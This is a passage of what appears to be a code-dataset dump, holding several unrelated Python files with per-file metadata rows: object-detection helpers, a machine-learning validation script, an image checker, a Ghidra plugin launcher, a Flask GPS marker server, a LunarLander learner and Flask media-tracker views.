    object_detection_outputs_aux = "../c_algorithm_outputs/object_detection_outputs_aux.csv"
    with open(object_detection_outputs, 'r') as f_in, open(object_detection_outputs_aux, 'w') as f_out:
        header = csv.reader(f_in, delimiter=',')
        writer = csv.writer(f_out, delimiter=',')
        for row in header:
            row_cnt += 1
            if (row_cnt == 1 and is_first_frame == True):
                row[1] = '1'
            if (row_cnt == 4):
                row[0] = str(frame_ID)
            writer.writerow(row)
    os.system("mv " + object_detection_outputs_aux + " " + object_detection_outputs)

def loadcsv(csvdata, roi_axes_limits):
    box_Xc = []
    vel = []
    area = []
    cnt_csv = 0
    with open(csvdata, 'r') as csvFile:
        reader = csv.reader(csvFile)
        for row in reader:
            if cnt_csv == 0:
                num_box = int(np.shape(row)[0]) - 2
                for x in range(2, len(row) - 1):
                    box_Xc.append(float(row[x]))
            if cnt_csv == 1:
                for x in range(0, num_box - 1):
                    vel.append(float(row[x]))
            if cnt_csv == 2:
                for x in range(0, num_box - 1):
                    area.append(float(row[x]))
            cnt_csv += 1
        csvFile.close()
    # Convert Xc from pixel dimensions to meters
    correctorX = (abs(roi_axes_limits[0][0]) + abs(roi_axes_limits[0][1])) / image_size[0]
    for i in range(len(box_Xc)):
        box_Xc[i] = box_Xc[i]*correctorX + roi_axes_limits[0][0]
    return box_Xc, vel, area

# Coral edgeTPU functions and constants
def make_interpreter(model_file):
    model_file, *device = model_file.split('@')
    return tflite.Interpreter(
        model_path=model_file,
        experimental_delegates=[
            tflite.load_delegate(EDGETPU_SHARED_LIB,
                                 {'device': device[0]} if device else {})
        ])

def input_size(interpreter):
    """Returns the input tensor shape as a (batch, width, height, channels) tuple."""
    batch, height, width, channels = interpreter.get_input_details()[0]['shape']
    return batch, width, height, channels

def input_tensor(interpreter):
    """Returns input tensor view as numpy array of shape (height, width, 3)."""
    tensor_index = interpreter.get_input_details()[0]['index']
    return interpreter.tensor(tensor_index)()[0]

def output_tensor(interpreter):
    """Returns dequantized output tensor."""
    output_details = interpreter.get_output_details()[0]
    output_data = np.squeeze(interpreter.tensor(output_details['index'])())
    scale, zero_point = output_details['quantization']
    return scale * (output_data - zero_point)

def set_input(interpreter, data):
    """Copies data to input tensor."""
    input_tensor(interpreter)[:, :] = data

def get_output(interpreter, top_k=1, score_threshold=0.0):
    """Returns no more than top_k classes with score >= score_threshold."""
    scores = output_tensor(interpreter)
    classes = [
        Class(i, scores[i])
        for i in np.argpartition(scores, -top_k)[-top_k:]
        if scores[i] >= score_threshold
    ]
    return sorted(classes, key=operator.itemgetter(1), reverse=True)
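
# Illustrative note (not from the original source): np.argpartition only
# guarantees that the last top_k indices correspond to the top_k largest
# scores, so the final sorted() call is what puts the best class first. E.g.
# with scores [0.1, 0.7, 0.05, 0.15] and top_k=2, argpartition may return
# indices 1 and 3 in either order; sorting by score yields class 1 first.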
labels = [ "Car", "Pedestrian", "Truck", "Cyclist"]
Class = collections.namedtuple('Class', ['id', 'score'])
EDGETPU_SHARED_LIB = {
    'Linux': 'libedgetpu.so.1',
    'Darwin': 'libedgetpu.1.dylib',
    'Windows': 'edgetpu.dll'
}[platform.system()]
if __name__ == "__main__":
    # execute only if run as a script
    os.chdir('../')  # Change the dir for the correct working of the C++ functions
    main()
| 44.506522 | 217 | 0.640014 | 2,650 | 20,473 | 4.65434 | 0.129434 | 0.100697 | 0.023188 | 0.007946 | 0.506729 | 0.385439 | 0.325928 | 0.294552 | 0.207556 | 0.182828 | 0 | 0.02037 | 0.239877 | 20,473 | 459 | 218 | 44.603486 | 0.772202 | 0.071851 | 0 | 0.212202 | 0 | 0 | 0.100148 | 0.057334 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055703 | false | 0 | 0.023873 | 0 | 0.119363 | 0.04244 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
392c38c4087be8ff3e32c8fcba510fcdd3370bb8 | 10,037 | py | Python | scripts/achived/classifcation5.py | nmningmei/metacognition | 734082e247cc7fc9d277563e2676e10692617a3f | [
"MIT"
] | 3 | 2019-07-09T15:37:46.000Z | 2019-07-17T16:28:02.000Z | scripts/achived/classifcation5.py | nmningmei/metacognition | 734082e247cc7fc9d277563e2676e10692617a3f | [
"MIT"
] | null | null | null | scripts/achived/classifcation5.py | nmningmei/metacognition | 734082e247cc7fc9d277563e2676e10692617a3f | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Aug 13 13:31:08 2018
@author: nmei
Cross experiment validation
"""
import os
working_dir = '../data/'
import pandas as pd
from tqdm import tqdm
pd.options.mode.chained_assignment = None
import numpy as np
from sklearn.metrics import roc_auc_score
from sklearn.utils import shuffle
from utils import (MCPConverter,
                   get_features_targets_groups,
                   make_clfs,
                   resample_ttest)
graph_dir = os.path.join(working_dir,'graph')
dot_dir = os.path.join(working_dir,'dot')
save_dir = '../results/'
if not os.path.exists(graph_dir):
    os.mkdir(graph_dir)
if not os.path.exists(dot_dir):
    os.mkdir(dot_dir)
########################### load the data of Exp 1 and Exp 2 #######################
# Exp 1
experiment = 'pos'
pos = pd.read_csv(os.path.join(working_dir,'PoSdata.csv'))
pos = pos[pos.columns[1:]]
# rename columns
pos.columns = ['participant',
               'blocks',
               'trials',
               'firstgabor',
               'success',
               'tilted',
               'correct',
               'RT_correct',
               'awareness',
               'RT_awareness',
               'confidence',
               'RT_confidence']
# Exp 2
experiment = 'att'
att = pd.read_csv(os.path.join(working_dir,'ATTfoc.csv'))
att = att[att.columns[1:]]
# rename columns
att.columns = ['participant',
               'blocks',
               'trials',
               'firstgabor',
               'attention',
               'tilted',
               'correct',
               'RT_correct',
               'awareness',
               'RT_awareness',
               'confidence',
               'RT_confidence']
########################################### data is ready ######################
########################################### initialization #####################
np.random.seed(12345)
results = dict(
    model = [],
    train = [],
    test = [],
    score_mean = [],
    score_std = [],
    pval = [],
    window = []
)
for n_back in range(11):  # loop through the number of trials looking back
    # get the features, targets, and subject groups for Exp 2 and the given n_back trial
    X_att, y_att, groups_att = get_features_targets_groups(
        att,  # the loaded dataframe
        n_back = n_back,  # n_back trials
        names = ['attention',  # need to normalize to 0 and 1
                 'awareness',  # need to normalize to 0 and 1
                 'confidence'],  # need to normalize to 0 and 1
        independent_variables = ['attention',
                                 'awareness',
                                 'confidence'],
        dependent_variable = 'correct'
    )
    X_pos, y_pos, groups_pos = get_features_targets_groups(
        pos,
        n_back = n_back,
        names = ['success',  # need to normalize to 0 and 1
                 'awareness',  # need to normalize to 0 and 1
                 'confidence'],  # need to normalize to 0 and 1
        independent_variables = ['success',
                                 'awareness',
                                 'confidence'],
        dependent_variable = 'correct'
    )
    ##################################################################################
    ###################### after we prepare the train-test data ######################
    ###################### we are ready for cross experiment validation ##############
    # train on pos and test on att - n_cv = 100
    n_cv = 100  # number of cross validation iterations
    pr = 0.7  # selected proportion of the data
    # select subsets of the training data and the test data to estimate the variance
    # of the cross validation
    # select a proportion of the training data
    idxs_train = [np.random.choice(len(X_pos),
                                   size = int(pr*len(X_pos)),
                                   replace = False
                                   ) for ii in range(n_cv)]
    # select the same proportion of the test data
    idxs_test = [np.random.choice(len(X_att),
                                  size = int(pr*len(X_att)),
                                  replace = False
                                  ) for ii in range(n_cv)]
    # for 2 models, we will perform the cross experiment validation
    for model_name in make_clfs().keys():
        scores = []
        permutation_scores = []
        n_permutations = 2000
        for idx_train, idx_test in tqdm(zip(idxs_train, idxs_test), desc='cv-{}'.format(model_name)):
            clf = make_clfs()[model_name]
            X_train = X_pos[idx_train]
            y_train = y_pos[idx_train]
            X_test = X_att[idx_test]
            y_test = y_att[idx_test]
            clf.fit(X_train, y_train)
            preds = clf.predict_proba(X_test)
            score = roc_auc_score(y_test, preds[:, -1])
            permutation_scores_ = []
            for n_permutation in range(n_permutations):
                y_test_randome = shuffle(y_test)
                permutation_scores_.append(roc_auc_score(
                    y_test_randome, preds[:, -1]
                ))
            scores.append(score)
            permutation_scores.append(permutation_scores_)
        permutation_scores = np.array(permutation_scores)
        scores = np.array(scores)
        # save the results
        results['model'].append(model_name)
        results['score_mean'].append(scores.mean())
        results['score_std'].append(scores.std())
        results['train'].append('POS')
        results['test'].append('ATT')
        results['window'].append(n_back)
        pval = (np.sum(permutation_scores.mean(0) >= scores.mean()) + 1.0) / (n_permutations + 1)
        results['pval'].append(pval.mean())
        print('att,window {},model {},scores = {:.3f}+/-{:.3f},p = {:.4f}'.format(
            n_back, model_name,
            scores.mean(), scores.std(), pval.mean()))

    # train on att and test on pos - n_cv = 100
    idxs_train = [np.random.choice(len(X_att),
                                   size = int(pr*len(X_att)),
                                   replace = False
                                   ) for ii in range(n_cv)]
    idxs_test = [np.random.choice(len(X_pos),
                                  size = int(pr*len(X_pos)),
                                  replace = False
                                  ) for ii in range(n_cv)]
    for model_name in make_clfs().keys():
        # print('cv - {}'.format(model_name))
        scores = []
        permutation_scores = []
        n_permutations = 2000
        for idx_train, idx_test in tqdm(zip(idxs_train, idxs_test), desc='cv-{}'.format(model_name)):
            clf = make_clfs()[model_name]
            X_train = X_att[idx_train]
            y_train = y_att[idx_train]
            X_test = X_pos[idx_test]
            y_test = y_pos[idx_test]
            clf.fit(X_train, y_train)
            preds = clf.predict_proba(X_test)
            score = roc_auc_score(y_test, preds[:, -1])
            permutation_scores_ = []
            for n_permutation in range(n_permutations):
                y_test_randome = shuffle(y_test)
                permutation_scores_.append(roc_auc_score(
                    y_test_randome, preds[:, -1]
                ))
            scores.append(score)
            permutation_scores.append(permutation_scores_)
        permutation_scores = np.array(permutation_scores)
        scores = np.array(scores)
        # save the results
        results['model'].append(model_name)
        results['score_mean'].append(scores.mean())
        results['score_std'].append(scores.std())
        results['train'].append('ATT')
        results['test'].append('POS')
        results['window'].append(n_back)
        pval = (np.sum(permutation_scores.mean(0) >= scores.mean()) + 1.0) / (n_permutations + 1)
        results['pval'].append(pval.mean())
        print('pos,window {},model {},scores = {:.3f}+/-{:.3f},p = {:.4f}'.format(
            n_back, model_name,
            scores.mean(), scores.std(), pval.mean()))
df = pd.DataFrame(results)
df_corrected = []
for (model, exp_train), df_sub in df.groupby(['model', 'train']):
    # idx_sort = np.argsort(df_sub.pval.values)
    # df_sub = df_sub.iloc[idx_sort, :]
    pvals = df_sub.pval.values
    converter = MCPConverter(pvals = pvals)
    d = converter.adjust_many()
    df_sub['p_corrected'] = d['bonferroni'].values
    df_corrected.append(df_sub)
df_corrected = pd.concat(df_corrected)
df_corrected.to_csv(os.path.join(save_dir, 'cross experiment validation.csv'),
                    index=False)
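
# Note on the permutation p-value used above (illustrative numbers): with k of
# the n_permutations shuffled-label mean AUCs at or above the observed mean
# AUC, p = (k + 1) / (n_permutations + 1); e.g. if 3 of 2000 permutations reach
# the observed score, p = 4/2001 ~ 0.002. The +1 terms keep p strictly > 0.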
import seaborn as sns
sns.set_context('poster')
sns.set_style('whitegrid')
df_corrected = pd.read_csv(os.path.join('../results/cross experiment validation.csv'))
g = sns.factorplot(x='window',
                   y='score_mean',
                   hue='model',
                   data=df_corrected,
                   row = 'train',
                   aspect=2,
                   dodge = .1,
                   ci = 99,
                   kind = 'point',
                   )
for ax in g.fig.axes:
    ax.axhline(0.5, linestyle='--', color='black', alpha=0.5)
(g.set_axis_labels('Trials look back', 'ROC AUC scores'))
g.fig.suptitle('Cross Experiment Validation\nTrain on one and test on the other', y=1.09)
g.savefig('../figures/Cross Experiment Validation Scores.png',
          dpi=400, bbox_inches='tight')
g = sns.factorplot(x='window',
                   y='p_corrected',
                   hue='model',
                   data = df_corrected,
                   row = 'train',
                   aspect = 2,
                   kind = 'bar')
| 34.850694 | 98 | 0.507721 | 1,121 | 10,037 | 4.354148 | 0.215879 | 0.055726 | 0.012293 | 0.020897 | 0.558082 | 0.499898 | 0.477566 | 0.460561 | 0.448679 | 0.431879 | 0 | 0.014515 | 0.347913 | 10,037 | 287 | 99 | 34.972125 | 0.731245 | 0.118561 | 0 | 0.524272 | 0 | 0 | 0.112626 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.038835 | 0 | 0.038835 | 0.009709 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
392d149ad0b50198610a97e8e0753d72575eb6b5 | 924 | py | Python | Scoring_Tools/check_stacks_2.py | htpans/htpans | 49b9c6cec007577bde5e8dfbce9acde45be78fbf | [
"MIT"
] | null | null | null | Scoring_Tools/check_stacks_2.py | htpans/htpans | 49b9c6cec007577bde5e8dfbce9acde45be78fbf | [
"MIT"
] | null | null | null | Scoring_Tools/check_stacks_2.py | htpans/htpans | 49b9c6cec007577bde5e8dfbce9acde45be78fbf | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Fri Jul 26 17:43:03 2019
@author: Eric Danielson
"""
from skimage import io
import os
import argparse
from tqdm import tqdm
argparser = argparse.ArgumentParser(
    description='Check a directory of images for corrupted files')
argparser.add_argument(
    '-i',
    '--input',
    help='path to a directory of images')

def _main_(args):
    image_path = args.input
    files = os.listdir(image_path)
    for f in tqdm(files):
        print("Trying to open " + f)
        image = None
        try:
            image = io.imread(os.path.join(image_path, f))
        except Exception:
            print("File " + f + " is corrupted")
        if image is not None:
            # images without 3 channels are also treated as corrupted
            if len(image.shape) < 3:
                print("File " + f + " is corrupted")

if __name__ == '__main__':
    args = argparser.parse_args()
    _main_(args) | 24.315789 | 70 | 0.554113 | 114 | 924 | 4.333333 | 0.614035 | 0.048583 | 0.040486 | 0.048583 | 0.08502 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025848 | 0.330087 | 924 | 38 | 68 | 24.315789 | 0.772213 | 0.089827 | 0 | 0.076923 | 0 | 0 | 0.208281 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0 | 0.153846 | 0 | 0.192308 | 0.115385 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
392d42b9edf6beeccc22b6acefd045b99b7ec43e | 574 | py | Python | hqtrace_start.py | halucinator/hq-tracer | 67d155142910aec25ef2fc14159cb0ef80a34111 | [
"BSD-3-Clause"
] | 1 | 2021-08-03T01:54:12.000Z | 2021-08-03T01:54:12.000Z | hqtrace_start.py | halucinator/hq-tracer | 67d155142910aec25ef2fc14159cb0ef80a34111 | [
"BSD-3-Clause"
] | null | null | null | hqtrace_start.py | halucinator/hq-tracer | 67d155142910aec25ef2fc14159cb0ef80a34111 | [
"BSD-3-Clause"
] | null | null | null | # Copyright 2021 National Technology & Engineering Solutions of Sandia, LLC (NTESS).
# Under the terms of Contract DE-NA0003525 with NTESS,
# the U.S. Government retains certain rights in this software.
#
# This script starts the HQTrace Plugin
#@Christopher Wright
#@category HQTracer
#@keybinding alt shift t
#@menupath HQTrace
#@description Trace HALucinator/Qemu addrlist file
from hqtrace_plugin import HQTracePlugin
if __name__ == "__main__":
    # 'state' is provided in the script's global namespace by Ghidra's script runner
    tool = state.getTool()
    hq_trace_plugin = HQTracePlugin(tool, True, True, True)
    tool.addPlugin(hq_trace_plugin)
| 35.875 | 85 | 0.773519 | 75 | 574 | 5.746667 | 0.76 | 0.060325 | 0.060325 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022541 | 0.149826 | 574 | 15 | 86 | 38.266667 | 0.860656 | 0.630662 | 0 | 0 | 0 | 0 | 0.039801 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
392d9ed47279e20510efa86956a52f2d4392ee39 | 2,816 | py | Python | gps_server/server.py | simonfong6/not-kiwi-bot | 9542f328542126b32b2bb2961eea3f4243bdd29f | [
"MIT"
] | 1 | 2018-05-16T00:52:53.000Z | 2018-05-16T00:52:53.000Z | gps_server/server.py | simonfong6/not-kiwi-bot | 9542f328542126b32b2bb2961eea3f4243bdd29f | [
"MIT"
] | null | null | null | gps_server/server.py | simonfong6/not-kiwi-bot | 9542f328542126b32b2bb2961eea3f4243bdd29f | [
"MIT"
] | 1 | 2020-09-24T17:58:34.000Z | 2020-09-24T17:58:34.000Z | #!/usr/bin/env python
"""
server.py
Tool to visualize GPS coordinates for donkeycar.
"""
from flask import Flask, request, send_from_directory, jsonify
import json
# File that stores the GPS markers
DATA_FILE = 'data.json'
# JSON status messages
SUCCESS = {'status' : {'success': True}}
FAIL = {'status': {'success': False}}
app = Flask(__name__)
def overwrite(some_file, data):
    """ Overwrite the entire file with the new dictionary.
    """
    some_file.seek(0)  # Go to the beginning of the file
    json.dump(data, some_file, indent=4)  # Dump all the data
    some_file.truncate()  # Discard leftover bytes in case the new JSON is shorter than the old contents
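
# Illustrative sketch (not from the original source) of the data.json layout
# the handlers below assume: a top-level "markers" list, e.g.
#   {"markers": [{"label": "home", "position": {"lat": 32.88, "lng": -117.23}}]}
# The exact marker fields and coordinates shown here are made up.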
@app.route('/')
def index():
""" Serve the index page.
"""
return send_from_directory('.', 'index.html')
@app.route('/favicon.ico')
def favicon():
""" Serve the favicon.
"""
return send_from_directory('.', 'favicon.ico')
@app.route('/markers')
def get_markers():
""" Reads from the data file and returns the markers as JSON.
"""
with open(DATA_FILE, 'r') as f:
data = json.load(f)
return jsonify(data)
@app.route('/markers/replace', methods=['GET','POST'])
def replace_markers():
""" Replaces all markers in the data file with the ones given.
"""
markers = request.json['markers']
print(json.dumps(markers, indent=4))
data = {'markers': markers}
with open(DATA_FILE, 'r+') as f:
overwrite(f,data)
return jsonify(SUCCESS)
@app.route('/markers/add', methods=['GET','POST'])
def add_markers():
""" Appends a given marker to the data file.
"""
marker = request.json['marker']
with open(DATA_FILE, 'r+') as f:
# Load the data from file as a dictionary.
data = json.load(f)
# Add the marker to the dictionary.
data['markers'].append(marker)
# Overwrite the entire file with the new dictionary.
        overwrite(f, data)
return jsonify(SUCCESS)
@app.route('/markers/update', methods=['GET','POST'])
def update_markers():
""" Update or add markers from the front-end
"""
marker = request.json
label = marker['label']
with open(DATA_FILE, 'r+') as f:
data = json.load(f)
updated = False
        for index, marker_db in enumerate(data['markers']):
            if marker_db['label'] == label:
                data['markers'][index]['position'] = marker['position']
                print("FOUND")
                updated = True
        if not updated:
            data['markers'].append(marker)
            print("NOT FOUND")
        overwrite(f, data)
return jsonify(SUCCESS)
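# A minimal client sketch for the endpoints above (an assumption, not part of
# the original tool): posts a sample marker to /markers/add on a locally
# running server; requires the third-party `requests` package.
def example_add_marker():
    import requests
    marker = {'label': 'home', 'position': {'lat': 32.88, 'lng': -117.23}}
    response = requests.post('http://localhost:3148/markers/add',
                             json={'marker': marker})
    return response.json()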
if __name__ == '__main__':
app.run(host='0.0.0.0', port=3148)
| 24.920354 | 77 | 0.580256 | 352 | 2,816 | 4.548295 | 0.298295 | 0.039975 | 0.037477 | 0.039975 | 0.201124 | 0.201124 | 0.179888 | 0.154903 | 0.102436 | 0.041224 | 0 | 0.005419 | 0.279119 | 2,816 | 112 | 78 | 25.142857 | 0.783251 | 0.236151 | 0 | 0.25 | 0 | 0 | 0.120879 | 0 | 0 | 0 | 0 | 0.008929 | 0 | 1 | 0.125 | false | 0 | 0.035714 | 0 | 0.267857 | 0.053571 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
392ece3eab4fceea4640046a996ab12e285120cf | 6,635 | py | Python | lunarlander/learn.py | brianquinlan/learn-machine-learning | 275284eafdeb4e0140ab5d877e06d3258f7b590a | [
"MIT"
] | 1 | 2018-05-10T02:55:15.000Z | 2018-05-10T02:55:15.000Z | lunarlander/learn.py | brianquinlan/learn-machine-learning | 275284eafdeb4e0140ab5d877e06d3258f7b590a | [
"MIT"
] | null | null | null | lunarlander/learn.py | brianquinlan/learn-machine-learning | 275284eafdeb4e0140ab5d877e06d3258f7b590a | [
"MIT"
] | null | null | null | # Copyright 2019 Brian Quinlan
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Learn how to play "Well Bouncer Game" using machine learning."""
import argparse
import os.path
import pickle
import signal
import warnings
import gym
import numpy as np
from sklearn.neural_network import MLPClassifier
from sklearn.linear_model import LogisticRegression, SGDClassifier
import sklearn.exceptions
import tqdm
import model
def _make_move(agent, state):
    # Sample an action from the agent's predicted action-probability distribution.
    probs = agent.predict_proba([state])[0]
    return np.random.choice(agent.classes_, p=probs)
def _select_elites(states_batch, actions_batch, rewards_batch, percentile=50):
reward_threshold = np.percentile(rewards_batch, percentile)
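    # Note: the strict `>` comparison can produce an empty elite set when all
    # rewards equal the percentile value (e.g. every session scores the same).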
elite_reward_indices = [
i
for i in range(len(rewards_batch))
if rewards_batch[i] > reward_threshold
]
elite_states = []
elite_actions = []
elite_scores = []
for i in elite_reward_indices:
elite_states.extend(states_batch[i])
elite_actions.extend(actions_batch[i])
elite_scores.append(rewards_batch[i])
return elite_states, elite_actions, elite_scores
def _generate_session(agent, env, state):
states = []
actions = []
total_reward = 0
while True:
states.append(state)
action = _make_move(agent, state)
state, reward, done, _ = env.step(action)
actions.append(action)
total_reward += reward
if done:
break
return states, actions, total_reward
def _train_one_state(agent, game, num_tries, elite_percentile, stop_checker):
env = gym.make(game)
initial_state = env.reset()
cenv = pickle.dumps(env)
state_lists = []
action_lists = []
scores = []
for _ in tqdm.tqdm(
range(num_tries), leave=False, ncols=31, bar_format="{bar}"
):
states, actions, score = _generate_session(
agent, pickle.loads(cenv), initial_state
)
if stop_checker():
return [], [], []
state_lists.append(states)
action_lists.append(actions)
scores.append(score)
elite_states, elite_actions, elite_scores = _select_elites(
state_lists, action_lists, scores, elite_percentile
)
return elite_states, elite_actions, elite_scores
def _self_train_once(
agent,
game,
num_games,
num_trials_per_game,
elite_percentile_per_state,
stop_checker,
):
combined_states = []
combined_actions = []
combined_scores = []
for _ in tqdm.tqdm(
range(num_games), leave=False, ncols=31, bar_format="{bar}"
):
states, actions, scores = _train_one_state(
agent,
game,
num_trials_per_game,
elite_percentile_per_state,
stop_checker,
)
if stop_checker():
return
combined_states.extend(states)
combined_actions.extend(actions)
combined_scores.extend(scores)
print(
"{:10.1f} {:10}".format(
np.mean(combined_scores), len(combined_states),
)
)
with warnings.catch_warnings():
warnings.simplefilter(
"ignore", category=sklearn.exceptions.ConvergenceWarning
)
agent.fit(combined_states, combined_actions)
def main():
stop = False
def quit_handler(signum, frame):
nonlocal stop
stop = True
print("Quitting...")
signal.signal(signal.SIGINT, quit_handler)
parser = argparse.ArgumentParser(
        description='Learn how to play "LunarLander".'
)
parser.add_argument(
"--model-file",
required=True,
help=(
"The file to use when loading and saving the "
"agent trained using machine learning. If the "
"file does not exist then a new one will be "
"created."
),
)
parser.add_argument(
"--agent-type",
choices=["logistic-regression", "mlp-classifier", "sgd-classifier"],
default="logistic-regression",
help="The type of machine learning agent to use.",
)
parser.add_argument(
"--num-games",
type=int,
default=100,
help=(
"The number of games to play before selecting the best ones for "
"training"
),
)
parser.add_argument(
"--num-trials-per-game",
type=int,
default=100,
help=(
"The number of games to play before selecting the best ones for "
"training"
),
)
parser.add_argument(
"--elite-percentile-per-state",
type=float,
default=50,
help=(
"The quality that a game must have (in terms of score) to be "
"selected for training."
),
)
args = parser.parse_args()
if args.model_file and os.path.exists(args.model_file):
m = pickle.load(open(args.model_file, "rb"))
if not isinstance(m, model.Model):
m = model.Model(m, "LunarLander-v2")
else:
if args.agent_type == "logistic-regression":
agent = LogisticRegression(solver="lbfgs", multi_class="auto")
elif args.agent_type == "sgd-classifier":
agent = SGDClassifier(loss="log", max_iter=1)
elif args.agent_type == "mlp-classifier":
agent = MLPClassifier(
hidden_layer_sizes=(10, 10, 10, 10), warm_start=True
)
agent.fit(
[np.array([0.5 for _ in range(8)])] * 4, list(range(4)),
)
m = model.Model(agent, "LunarLander-v2")
print(
"{:>10} {:>9.0f}% {:>10}".format(
"MEAN", args.elite_percentile_per_state, "KEPT"
)
)
print("{:>10} {:>10} {:>10}".format("====", "===", "===="))
while not stop:
_self_train_once(
m.agent,
m.game,
args.num_games,
args.num_trials_per_game,
args.elite_percentile_per_state,
lambda: stop,
)
pickle.dump(m, open(args.model_file, "wb"))
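# Example invocation (hypothetical file name; the flags are defined above):
#   python learn.py --model-file agent.pkl --agent-type mlp-classifier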
if __name__ == "__main__":
main()
| 27.417355 | 78 | 0.609495 | 784 | 6,635 | 4.970663 | 0.327806 | 0.026944 | 0.023095 | 0.02951 | 0.201437 | 0.175263 | 0.132923 | 0.119066 | 0.096998 | 0.075443 | 0 | 0.012005 | 0.284401 | 6,635 | 241 | 79 | 27.53112 | 0.808762 | 0.09254 | 0 | 0.219895 | 0 | 0 | 0.131767 | 0.008163 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036649 | false | 0 | 0.062827 | 0 | 0.13089 | 0.020942 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3933365abb5430b754b10a4e77d9d9f75fd097cc | 3,001 | py | Python | MediaTracker/views/views_main.py | sarahbeharrygoss/MediaTracker | 3df8ae27534ed5c9933cc4944b90372d5f569692 | [
"MIT"
] | null | null | null | MediaTracker/views/views_main.py | sarahbeharrygoss/MediaTracker | 3df8ae27534ed5c9933cc4944b90372d5f569692 | [
"MIT"
] | null | null | null | MediaTracker/views/views_main.py | sarahbeharrygoss/MediaTracker | 3df8ae27534ed5c9933cc4944b90372d5f569692 | [
"MIT"
] | null | null | null | from __future__ import unicode_literals
from MediaTracker.flask_app_and_db import flask_app as app
from MediaTracker import models
from flask import render_template, request
from MediaTracker.forms import MediaForm
from MediaTracker.controllers import media_controller, tag_controller
from urllib.parse import urlencode
from collections import OrderedDict
@app.route('/', methods=['GET', 'POST'])
def index():
tag_id = request.args.get('filter_by_tag') or request.args.get('selected_tag')
sortcode = request.args.get('do_sort') or request.args.get('selected_sort')
media_list = media_controller.get_all_media(tag_id, sortcode)
form = create_new_media_form()
compressed = request.args.get('compressed')
return render_template('index.html',
media_list=media_list,
mediaForm=form,
filter_tag=tag_controller.get_tag(tag_id) if tag_id else None,
sort=sortcode,
compressed=compressed,
query_string=create_query_string(tag_id, sortcode, compressed),
create_query_string=create_query_string,
create_episode_string=create_episode_string)
# Helper functions
def create_query_string(tag_id, sortcode, compressed):
settings = {k: v for k, v in OrderedDict(selected_tag=tag_id,
selected_sort=sortcode,
compressed=compressed).items() if v}
return urlencode(settings)
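# For example, create_query_string('3', 'name', None) yields
# 'selected_tag=3&selected_sort=name'; falsy settings are dropped.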
def create_episode_string(media):
return 'Current episode: ' + ('%.12g' % media.current_episode.episode_number
if media.current_episode else 'Not started')
def create_new_media_form(media=None):
form = MediaForm()
# Need to populate episode dropdown choices, otherwise null error during validation
if media:
form.current_episode_id.query = media_controller.get_episodes_for_media_query(media.id).order_by(
models.Episode.episode_number)
form.tags.choices = [(tag.id, tag.name) for tag in tag_controller.get_all_tags()]
form.tags.data = [tag.id for tag in media.tags]
return form
def read_media_form(media=None):
form = MediaForm()
# Need to populate episode dropdown choices, otherwise null error during validation
if media:
form.current_episode_id.query = media_controller.get_episodes_for_media_query(media.id).order_by(
models.Episode.episode_number)
form.tags.choices = [(tag.id, tag.name) for tag in tag_controller.get_all_tags()]
return form
# Error pages
@app.errorhandler(404)
def not_found_error(error):
return render_template('404.html'), 404
@app.errorhandler(500)
def internal_error(error):
return render_template('500.html'), 500
@app.errorhandler(503)
def service_unavailable_error(error):
return render_template('500.html'), 503
